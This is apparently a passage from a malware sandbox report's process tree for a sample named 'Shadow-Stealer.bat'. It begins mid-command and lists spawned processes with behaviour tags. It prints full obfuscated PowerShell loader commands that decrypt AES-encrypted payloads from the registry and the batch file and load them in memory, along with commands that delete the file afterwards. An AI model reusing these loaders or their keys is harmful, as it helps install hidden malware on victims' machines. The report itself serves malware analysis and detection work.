$UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3376

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{be0e7d18-2e6c-4e3a-90c8-b7afba5aa508}
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4968

C:\Windows\$sxr-powershell.exe
"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3376).WaitForExit();[System.Threading.Thread]::Sleep(5000); function VOHZF($Lwtxx){ $xCaUG=[System.Security.Cryptography.Aes]::Create(); $xCaUG.Mode=[System.Security.Cryptography.CipherMode]::CBC; $xCaUG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $xCaUG.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0='); $xCaUG.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg=='); $CTnvz=$xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')(); $oMfGF=$CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Lwtxx, 0, $Lwtxx.Length); $CTnvz.Dispose(); $xCaUG.Dispose(); $oMfGF;}function nnKof($Lwtxx){ $ABMbT=New-Object System.IO.MemoryStream(,$Lwtxx); $FswzF=New-Object System.IO.MemoryStream; $ZWQus=New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::Decompress); $ZWQus.CopyTo($FswzF); $ZWQus.Dispose(); $ABMbT.Dispose(); $FswzF.Dispose(); $FswzF.ToArray();}function vzvJZ($Lwtxx,$kAWoQ){ $kXIpu=[System.Reflection.Assembly]::Load([byte[]]$Lwtxx); $OPPDg=$kXIpu.EntryPoint; $OPPDg.Invoke($null, $kAWoQ);}$xCaUG1 = New-Object System.Security.Cryptography.AesManaged;$xCaUG1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$qsFQP = $xCaUG1.('rotpyrceDetaerC'[-1..-15] -join '')();$UMIrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2twxIFMV1JWyz0b8BpHEfA==');$UMIrZ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ, 0, $UMIrZ.Length);$UMIrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ);$PYyQA = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p05ztWCKuMfos2Q8RYoS+FIXy2DypHHbyYGL6Z+cEc8=');$PYyQA = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($PYyQA, 0, $PYyQA.Length);$PYyQA = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($PYyQA);$roofG = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sy8HcJTfKA/mf4hPH+Go6g==');$roofG = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($roofG, 0, $roofG.Length);$roofG = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($roofG);$tgmGC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BuxXfqRY1RoP0b/ROY4PrLV7XH6EyWkqL6UOT7VtjFZgNba4DmwvRZ0rEKh6tsW5E4dar7n8yKYorGfhmfzDSchZoElrP0gmf7pENQ75eXbqF+3j4N1LjY1xzYPYeJFwvJGbJvqe3CPoWhNQATtYtY/6ujGYTqqhsjIgqQdcVJyCExpvLG1KTAiDHwbcLEgHzlPLvK+nTj2PYL6WYsFa3I8rptDz3r9IvJABT8A6TOqZRS2q9nM/2K1/IRFUTDKvPPtYy9cd0jq4MTO7gDnvlUAC8kJM0rAwSo8RwA3zKJNYBBv03aq6fIf9zugDa03cb0yO24aIfe5AFN+zOGDLKtWrsyyIVpjarzDCbBlxkhPRynAyHBM2A5pmzVa2gAc2+o8odD180Z07f5ZL3mYwTO8G4arHTtORWkqMdtdm7CA=');$tgmGC = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($tgmGC, 0, $tgmGC.Length);$tgmGC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($tgmGC);$zvkCv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JVVxi793TWK0eiazbMjyxQ==');$zvkCv = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zvkCv, 0, $zvkCv.Length);$zvkCv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zvkCv);$MrvyW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('y9CiMcnIF08D1mbStDfFzg==');$MrvyW = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($MrvyW, 0, $MrvyW.Length);$MrvyW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($MrvyW);$UFhRe = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('4Gkz3kktZWs5v4iY/fwpuA==');$UFhRe = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UFhRe, 0, $UFhRe.Length);$UFhRe = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UFhRe);$BdNHQ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mWujaRBJ7Bka6/SLPc2zjg==');$BdNHQ = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BdNHQ, 0, $BdNHQ.Length);$BdNHQ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BdNHQ);$NXCWg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JS1eCTl+J3Vy2lPum4BV+A==');$NXCWg = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NXCWg, 0, $NXCWg.Length);$NXCWg = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($NXCWg);$UMIrZ0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Xun+s5YVAeQzgGPJKptAJw==');$UMIrZ0 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ0, 0, $UMIrZ0.Length);$UMIrZ0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ0);$UMIrZ1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tKxTd8rUmwwPDWYqtJ+flg==');$UMIrZ1 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ1, 0, $UMIrZ1.Length);$UMIrZ1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ1);$UMIrZ2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QwPWmxWc7oP0xMzohMzOyA==');$UMIrZ2 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ2, 0, $UMIrZ2.Length);$UMIrZ2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ2);$UMIrZ3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('00EoyZz50MzeF+YVDb5OyQ==');$UMIrZ3 = $qsFQP.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UMIrZ3, 0, $UMIrZ3.Length);$UMIrZ3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UMIrZ3);$qsFQP.Dispose();$xCaUG1.Dispose();if (@(get-process -ea silentlycontinue $UMIrZ3).count -gt 1) {exit};$dINWW = [Microsoft.Win32.Registry]::$BdNHQ.$UFhRe($UMIrZ).$MrvyW($PYyQA);$QJXfU=[string[]]$dINWW.Split('\');$flTmo=nnKof(VOHZF([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[1])));vzvJZ $flTmo (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$iBTnS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($QJXfU[0]);$xCaUG = New-Object System.Security.Cryptography.AesManaged;$xCaUG.Mode = [System.Security.Cryptography.CipherMode]::CBC;$xCaUG.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$xCaUG.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TM3zfpDKMZynPMfLQy1uVeWzaY6DhwGL3hPqgMb2Tk0=');$xCaUG.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zUMRaMteR/3la6UhCTH1Gg==');$CTnvz = $xCaUG.('rotpyrceDetaerC'[-1..-15] -join '')();$iBTnS = $CTnvz.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iBTnS, 0, $iBTnS.Length);$CTnvz.Dispose();$xCaUG.Dispose();$ABMbT = New-Object System.IO.MemoryStream(, $iBTnS);$FswzF = New-Object System.IO.MemoryStream;$ZWQus = New-Object System.IO.Compression.GZipStream($ABMbT, [IO.Compression.CompressionMode]::$UMIrZ1);$ZWQus.$NXCWg($FswzF);$ZWQus.Dispose();$ABMbT.Dispose();$FswzF.Dispose();$iBTnS = $FswzF.ToArray();$JJwWP = $tgmGC | IEX;$kXIpu = $JJwWP::$UMIrZ2($iBTnS);$OPPDg = $kXIpu.EntryPoint;$OPPDg.$UMIrZ0($null, (, [string[]] ($roofG)))
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4716

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{96c33985-81e6-4e05-9bbe-da1980776803}
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3340

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{bf6b6f95-deda-4803-b2a0-5aa1592b2deb}
5⤵
PID:5480

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 476
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3112

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{ca3d5849-971f-46fa-b6ea-8e33e4c20a40}
5⤵
PID:5792

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{40d50a0c-a320-4ac2-a877-2d461bbf1d53}
5⤵
PID:4968

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{56fef73a-7b3e-41cb-9dec-bc3ea2609aac}
5⤵
PID:5364

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{980745c6-a03c-4fd2-b338-9772e64035ba}
5⤵
PID:5732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5732 -s 476
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5544

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{22216ce1-e38d-4ceb-89da-003019ff7b6a}
5⤵
PID:6064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6064 -s 476
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:4908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1272

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1356

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1456

C:\Windows\system32\sihost.exe
sihost.exe
2⤵
PID:1988

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1504

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1608

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1724

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1828

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1888

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2080

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2152

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2276

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2368

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2480

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
- Drops file in System32 directory
PID:2524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2612

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2624

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
PID:2652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2700

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2812

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:676

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3332

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4272

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:1704

C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe
"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Deletes itself
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{90a5ed3d-9d35-4845-ad94-9792d6a8b103}
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3852

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{dde74d24-75e2-4b87-92ce-3f3e0102344f}
4⤵
PID:2892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2892 -s 156
5⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5652

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe" & exit
4⤵
PID:5840

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5228

C:\Windows\system32\PING.EXE
PING localhost -n 8
5⤵
- Runs ping.exe
PID:4888

C:\Windows\system32\taskkill.exe
taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
5⤵
- Kills process with taskkill
PID:5860

C:\Windows\system32\attrib.exe
ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe"
5⤵
- Views/modifies file attributes
PID:4248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:3508

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3840

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of UnmapMainImage
PID:3908

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
1⤵
PID:3964

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:4312

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
1⤵
PID:4348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4552

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1132

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2408

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:828

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3988

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:2100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2916

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3880

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Drops file in System32 directory
PID:1432

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3412

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5044

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:4252

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1380

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5040

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 2892 -ip 2892
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5480 -ip 5480
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2464

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 5732 -ip 5732
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3064

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 688 -p 5532 -ip 5532
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5360

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 6064 -ip 6064
2⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5328

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:6000

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5520

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:6092

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:Global.Accounts.AppXqe94epy97qwa6w3j6w132e8zvcs117nd.mca
1⤵
PID:3732

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3732 -s 940
2⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:4380

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 408 -p 3732 -ip 3732
2⤵
PID:1544

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
